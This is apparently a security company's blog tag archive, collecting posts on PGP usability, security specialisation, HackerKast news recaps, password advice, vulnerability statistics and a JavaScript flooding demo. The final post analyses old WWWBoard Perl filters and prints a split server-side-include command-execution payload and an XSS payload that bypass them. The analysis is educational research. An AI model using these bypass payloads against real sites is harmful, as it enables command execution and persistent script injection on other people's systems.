Tag Archives: web application security

PGP: Still hard to use after 16 years

Earlier this month, SC magazine ran an article about this tweet from Joseph Bonneau at the Electronic Frontier Foundation:

Email from Phil Zimmerman: “Sorry, but I cannot decrypt this message. I don’t have a version of PGP that runs on any of my devices”

PGP, short for Pretty Good Privacy, is an email encryption system invented by Phil Zimmerman in 1991. So why isn’t Zimmerman eating his own dog food?

“The irony is not lost on me,” he says in this article at Motherboard, which is about PGP’s usability problems. Jon Callas, former Chief Scientist at PGP, Inc., tweeted that “We have done a good job of teaching people that crypto is hard, but cryptographers think that UX is easy.” As a cryptographer, it would be easy to forget that 25% of people have math anxiety. Cryptographers are used to creating timing attack-resistant implementations of AES. You can get a great sense of what’s involved from this explanation of AES, which is illustrated with stick figures. The steps are very complicated. In the general population, surprisingly few people can follow complex written instructions.

All the way back in 1999, there was a paper presented at USENIX called “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0.” It included a small study with a dozen reasonably intelligent people:

The user test was run with twelve different participants, all of whom were experienced users of email, and none of whom could describe the difference between public and private key cryptography prior to the test sessions. The participants all had attended at least some college, and some had graduate degrees. Their ages ranged from 20 to 49, and their professions were diversely distributed, including graphic artists, programmers, a medical student, administrators and a writer.

The participants were given 90 minutes to learn and use PGP, under realistic conditions:

Our test scenario was that the participant had volunteered to help with a political campaign and had been given the job of campaign coordinator (the party affiliation and campaign issues were left to the participant’s imagination, so as not to offend anyone). The participant’s task was to send out campaign plan updates to the other members of the campaign team by email, using PGP for privacy and authentication. Since presumably volunteering for a political campaign implies a personal investment in the campaign’s success, we hoped that the participants would be appropriately motivated to protect the secrecy of their messages…

After briefing the participants on the test scenario and tutoring them on the use of Eudora, they were given an initial task description which provided them with a secret message (a proposed itinerary for the candidate), the names and email addresses of the campaign manager and four other campaign team members, and a request to please send the secret message to the five team members in a signed and encrypted email. In order to complete this task, a participant had to generate a key pair, get the team members’ public keys, make their own public key available to the team members, type the (short) secret message into an email, sign the email using their private key, encrypt the email using the five team members’ public keys, and send the result. In addition, we designed the test so that one of the team members had an RSA key while the others all had Diffie-Hellman/DSS keys, so that if a participant encrypted one copy of the message for all five team members (which was the expected interpretation of the task), they would encounter the mixed key types warning message. Participants were told that after accomplishing that initial task, they should wait to receive email from the campaign team members and follow any instructions they gave.

If that’s mystifying, that’s the point. You can get a very good sense of how you would’ve done, and how much has changed in 16 years, by reading the Electronic Frontier Foundation’s guide to using PGP on a Mac. The study participants were given 90 minutes to complete the task.

Things went wrong immediately:

Three of the twelve test participants (P4, P9, and P11) accidentally emailed the secret to the team members without encryption. Two of the three (P9 and P11) realized immediately that they had done so, but P4 appeared to believe that the security was supposed to be transparent to him and that the encryption had taken place. In all three cases the error occurred while the participants were trying to figure out the system by exploring.

Cryptographers are absolutely right that cryptography is hard:

Among the eleven participants who figured out how to encrypt, failure to understand the public key model was widespread. Seven participants (P1, P2, P7, P8, P9, P10 and P11) used only their own public keys to encrypt email to the team members. Of those seven, only P8 and P10 eventually succeeded in sending correctly encrypted email to the team members before the end of the 90 minute test session (P9 figured out that she needed to use the campaign manager’s public key, but then sent email to the the entire team encrypted only with that key), and they did so only after they had received fairly explicit email prompting from the test monitor posing as the team members. P1, P7 and P11 appeared to develop an understanding that they needed the team members’ public keys (for P1 and P11, this was also after they had received prompting email), but still did not succeed at correctly encrypting email. P2 never appeared to understand what was wrong, even after twice receiving feedback that the team members could not decrypt his email.
Another of the eleven (P5) so completely misunderstood the model that he generated key pairs for each team member rather than for himself, and then attempted to send the secret in an email encrypted with the five public keys he had generated. Even after receiving feedback that the team members were unable to decrypt his email, he did not manage to recover from this error.

The user interface can make it even harder:

P7 gave up on using the key server after one failed attempt in which she tried to retrieve the campaign manager’s public key but got nothing back (perhaps due to mis-typing the name). P1 spent 25 minutes trying and failing to import a key from an email message; he copied the key to the clipboard but then kept trying to decrypt it rather than import it. P12 also had difficulty trying to import a key from an email message: the key was one she already had in her key ring, and when her copy and paste of the key failed to have any effect on the PGPKeys display, she assumed that her attempt had failed and kept trying. Eventually she became so confused that she began trying to decrypt the key instead.

This is all so frustrating and unpleasant for people that they simply won’t use PGP. We actually have a way of encrypting email that’s not known to be breakable by the NSA. In practice, the human factors are even more difficult than stumping the NSA’s cryptographers!

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • Github
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duosec 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • Apparmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API to WordPress.org for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but they can’t know all of these things all at once, especially given how quickly technologies change. Since there is no one who can understand all of those things at once, we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the numbers of full-stack security experts. People may know quite a bit about a lot of these technologies, but when it comes down to it, there’s a very real chance that any single security person will become more and more specialized over time — it’s simply hard to avoid specialization, given the growing complexity of modern apps. We may eventually see the death of the full-stack security person as well as a result.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means that there will be more and more silos where people will handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failure to use a diverse and potentially external expertise in security/operations will ensure sec-ops failure.

At its heart, this is a result of economic forces – more code needs to be delivered and there are fewer people who understand what it’s actually doing. So outsource what you can’t know since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other services providers and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs and we were impressed to see that 87% of the respondents perform static analysis. 32% of them perform it with each major release and 13% are performing it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibly into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion and perhaps intentional fear uncertainty and doubt (FUD) in this area. The way you go about testing third party software should mirror the way you go about testing your own software. Binary analysis of software for the purpose of not exposing your Intellectual Property (IP) is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort is no problem. Tools such as ILSpy and Show My Code are freely and widely available.Sharing your binaries in an attempt to protect your Intellectual Property actually end up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options that allow for binary review that other vendors require. Or at a very minimum it requires that those same binaries never get uploaded to production where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP you need to make certain your binaries don’t fall into the wrong hands, because inside of those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

#HackerKast 23: Lenovo, Venmo Sex, Drugs, and Guns, Casino Hacked, WordPress, Remotely Hacking Cars

Hey everybody! Welcome to this week’s HackerKast. We’ve got Jer back! We put this one out late this week just to get him back in the mix.

First, we absolutely HAD to talk about Lenovo and Superfish. For those living under a rock, Superfish is default installed on Lenovo laptops and does all sorts of nasty MiTM things by breaking SSL locally to inspect traffic. They did this under the guise of advertising (of course) but it was awful once we all found out. Robert Graham over at Errata Security did a great writeup on all of some technical deep diving he did into what was going on with these certificates.

Tied to that same story, Lizard Squad reared their head again with their specialty, a DNS hack! Their target this time was Lenovo due to recent events and they were able to take over their domain registrar through Command Injection. Brian Krebs did some digging and realized it was all due to the WebNIC registrar being vulnerable to an attack.

Moving along to some fun clickbait story with an actual funny privacy twist, Venmo made the news this week in a bad way. The headline we couldn’t ignore was “New Site Tells You Who’s Paying For Sex, Drugs, and Alcohol Using Venmo.” Sounds interesting right? Well turns out Venmo has turned itself into a bit of a social network on who is giving money to whom and for what. The kicker here is that all that information goes to a public timeline unless specifically turned private. Nobody bothers to change anything to private so a site called Vicemo popped up to gather all the illicit payments and put them in their own feed. Check out all the amusing things people are sharing money for.

Next, Jer talked about a few more details of a story we talked about back in 2014 of a Las Vegas Casino getting hacked via a publicly facing development site. The hack is being attributed to the Iranians who ran amok once they got in the network of the Casino. They did this after a lot of time brute forcing their VPN to no avail. Just goes to show how important it is to figure out what websites are public facing!

We had to talk about this next one even though it’s a bit embarrassing. We’ve all got vulns! Even WhiteHat! We eat our own dog food and run our scanner on our website constantly and we found a bug on our blog caused by the WordPress plugin we use to publish our podcast on iTunes. Imagine that… A WordPress plugin causing a vulnerability… Who woulda thunk? Anyway, we emailed them and in the mean time coded up a hotfix after immediately removing the plugin from production. Before we even got a chance to hot patch with our own code though, the developer of the plugin from South Africa woke up and rolled out his own fix in less than 1 day. Good news all around!

Lastly we talked about a fun and scary news story about remotely bricking cars. Some car dealerships install these little black boxes they install in cars that they sell. These boxes are used to remotely disable the car if people get behind on their payments making the cars easier to repossess. What were all of these black boxes controlled by? A web app! Some IT guy who left the company “hacked” back in (I’m guessing used his access that wasn’t turned off yet) and started remotely shutting down cars in Texas left and right. This brings up a bit of a conversation about Internet of Things where Robert does what he does best and scares everybody off the Internet.

Sorry for the late one this week, hope you all enjoyed!

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay


Lenovo shipping with pre-installed Adware and SSL certificate “Komodia”
Extracting the Superfish Certificate
Lenovo’s DNS Gets Hijacked by Lizard Squad using Command Injection in Registrar
Webnic Registrar Blamed for Hijack of Lenovo, Google Domains
Site Discloses Who is Paying for Sex, Drugs and Guns
Las Vegas Casino Hacked by Iranians in 2014
The time a hacker remotely bricked cars in Texas

Notable stories this week that didn’t make the cut:
AT&T Extorts Users For Privacy
Cybersecury Czar Claims Selfies Are Good Biometrics
HTTP/2.0 “Finalized”
Google’s new Hacker Classifier Misclassifies Websites As Hacked
GCHQ & NSA’s Great SIM Heist
Turbotax’s Anti-Fraud Efforts Under Scrutiny
Origins of Russian Astroturfing
Google Making Adult Blogs Private – Effectively Shutting Them Down
Infinity Million Bug Bounty for Pwnium
Net Neutrality Passed!

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of attacks against and/or hijacking of DNS, it occurred to me that most people really don’t know what to do about it. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Especially for smaller companies who may not have as many customers, or only accept comments through a website, they may never know unless they randomly check, or the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes a Perl script) that can be run out of cron and can monitor one or more hostname-to-IP-address pairs of sites that are critical to you. If anything happens it’ll send you an alert via email. There are other tools that do this or similar things, but it’s another tool in your arsenal; and most importantly dnstest is meant to be very lightweight and simple to use. You can download dnstest here.

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

Web Security for the Tech-Impaired: Passwords that Pass the Test

In my last post, “The Dangers of Email”, I explored ways that folks who are less than technically savvy can practice good email security hygiene. Today we’ll get into a somewhat controversial subject: passwords. You use them everyday to log in to your bank account, credit card, Amazon — the list goes on and on. You probably log in to a few websites everyday, but how often do you think about that password you’ve chosen? Password security is a hot button topic and everyone has their own suggestion about what constitutes a good strong password. This post will help guide you to a relatively secure password.

Your password is your key to your online accounts. It’s the ID you create to prove that you are who you say you are in a digital world. As humans we tend to make passwords that are easy to remember. If you forget your password you often are prompted with a difficult series of steps to recover it, from answering security questions to calling a support line. To skip all that headache we often create passwords that are pretty easy to guess and we use those passwords for all our accounts. This makes it very easy for an attacker to gain access to all your accounts. If one site where I use that password is compromised and my password is leaked, the attackers now know my password for every single account I’ve created. No matter how quick I change those passwords I will most likely miss or forget one. This is why it’s a good idea to use a variety of passwords. Very secure folks will create a different password for every account they create. I would recommend that at the very least you create separate passwords for your sensitive accounts (your bank account, credit card, 401k, and so on).

Now the question is, what is considered a good password? It might surprise you to know that modern computers can ‘guess’ passwords quite quickly, often going through millions of potential passwords a day. Passwords that are just words are incredibly weak passwords that can be guessed quite quickly. Also short passwords are out. Most experts agree that passwords should be at least 12 characters long. To make it harder to break, your password should contain a mixture of upper case and lower case characters, numbers, and special characters (such as !,@,#,$,?). It’s also a good idea to vary where these characters are placed. A friend of mine recently played ‘mind reader’ to some colleagues of mine. He had them think of a password of theirs. He then guessed that the first part of the password was a word of about 8 characters. That word is then followed by two numbers. The last character of the password is a special character. They were dumbfounded. Yes the human brain works the same for all of us. As we’re asked to do more and more things to our passwords we simply tack them on at the end. This is a pattern that hackers know about and will exploit.

So to sum up, here are some tips to help you practice good password habits:
1) Use a different password for all your important accounts. To win a gold star use a different password on all accounts.
2) Your password should be no less then 12 characters
3) Use a mix of lower case, upper case, numbers and special characters.
4) Don’t use the very common sequence of word-number-special character. Mix up where these are placed in your password.

Again, I urge our readers to feel free to forward this post on to friends or family that may benefit from these tips. Many in the security industry often forget that most consumers are less technically savvy, and therefore less security aware, than we are. This series is designed to help you, help them.

#HackerKast 16: India blocks GitHub, GoGo fake SSL certificates, North Korea’s only network

Happy 2015 everybody! Jeremiah, Robert, and I got right back on track our first week back in the office and there were plenty of stories to talk about. Turns out hackers don’t really take vacation.

Right off the bat Robert brought up a story about the Indian government pulling a China and blocking access to a ton of sites this week. Some notable sites include Pastebin, Dailymotion, and Github, according to reports coming from Indian users. The reasons cited all have to do with anti-terrorism and blocking potential terrorists’ access to sites that can be used as virtual dead drops. This seems like a complete overreaction to us and has some serious overarching repercussions, most obviously the fact that a giant chunk of the world’s developers can no longer access the largest chunk of open source code, GitHub. We’ll see where this goes but if you’re an investor in VPN services you probably have a big smile on your face right about now.

Next, I brought up some disturbing tweets that caught my eye this week about GoGo Inflight WiFi services. If any of you are frequent flyers like us you’ve undoubtably been forced to use GoGo at some point, but a few more technically savvy users noticed GoGo is up to no good recently. While browsing the internet in the air, some noticed that GoGo was issuing fake SSL certificates while browsing certain websites such as Google and YouTube. Ironically, the user who started attracting attention to this was an engineer who worked for Google. This effectively allows GoGo to Man in The Middle all the SSL traffic of their users and read sensitive data that should be encrypted. Spokespeople from GoGo have stated this is only used to block or throttle video streaming services so that there is enough bandwidth to go around but it is still pretty shady that they have access to sensitive information.

Next, Robert found a fun image floating around of a (the?) North Korean web browser called Naenara Browser:


This was just something really quick we wanted to bring up because the screenshot shows that as soon as you install this browser it makes a call to a RFC 1918 address ( from your computer. The importance of this that left my jaw open was that this means that all of North Korea is on the same network. As in intranet. Things that make you go “Wah?”.

Ever think you found something cool and couldn’t wait to share it with your friends? Well don’t share it with RSnake because he probably knows about it already. As was the case with this “recent” HSTS (HTTP Strict Transport Security) research coming out of the UK. A few weeks ago you might remember us mocking Google’s former CEO Eric Schmidt over his claim that Google’s Incognito mode would protect you from the NSA. Well after we all facepalmed collectively on the podcast, this researcher in the UK decided to set out and prove Schmidt wrong. Robert gets into the technical details of deanonymizing somebody with the nitty gritty of how HSTS works, which is super interesting and deserves a read through some of these blog posts.

Lastly, we talked about Moonpig. Not to be confused with Pigs In Space.


This Moonpig is an online mail order greeting card service. While most mail order greeting card services are at the forefront of information security, Moonpig fell victim to a vulnerability in their API which allowed full account take over of any user. Their API was poorly designed and had no authentication at all which allowed just a quick flip of a customerID parameter to start impersonating other users, making fake orders, stealing credit card information, etc. The kicker of this vulnerability was that it was responsibly disclosed to Moonpig back in August of 2013 and responded with they’d “get right on it”. 17 months later, this researcher and user of Moonpig was frustrated of waiting for a fix and decided to write them again in September 2014. The reply this time was that a fix was coming before Christmas. Well, New Years has just passed and the researcher decided to publish his findings publicly and guess what? Less than 24 hours an engaget article later the API was pulled offline. Another unfortunate win for Full Disclosure.

We closed off with some musings about time to fix statistics and overall browser security suggestions for everyday people. Unfortunately we are going to have to break the web to fix the web. There is a Dan Kaminsky quote about this never happening somewhere…

That’s all for this week. Stay tuned for next week when hopefully we’ll have some bonus footage for you all. Also! Check us out in iTunes now for those of you who like that sort of thing and would rather just listen to the podcast instead of staring at our mugs for 15-20 minutes.

Happy New Year!

Notable stories this week that didn’t make the cut:
Banks doing Hack-back being investigated by FBI
Playstation network may have just been a ploy to market a DDoS tool
But then one of the alleged Lizard Mafia guys got arrested, and another is being questioned
Katie from HackerOne was detained and forced to decrypt her laptop in France – don’t travel with exploits or anything you care about!
$5M US in Bitcoin stolen from Bitstamp in unexplained hack

Pastebin, Dailymotion, Github blocked after DoT order: Report
Gogo issues fake HTTPS certificate to users visiting YouTube
North Korean Browser
Brit Proves Google’s Eric Schmidt Totally Wrong: Super Cookies Can Track Users Even When In Incognito Mode
Moonpig flaw leaves customer accounts wide open for 17 months (update)

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:


I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.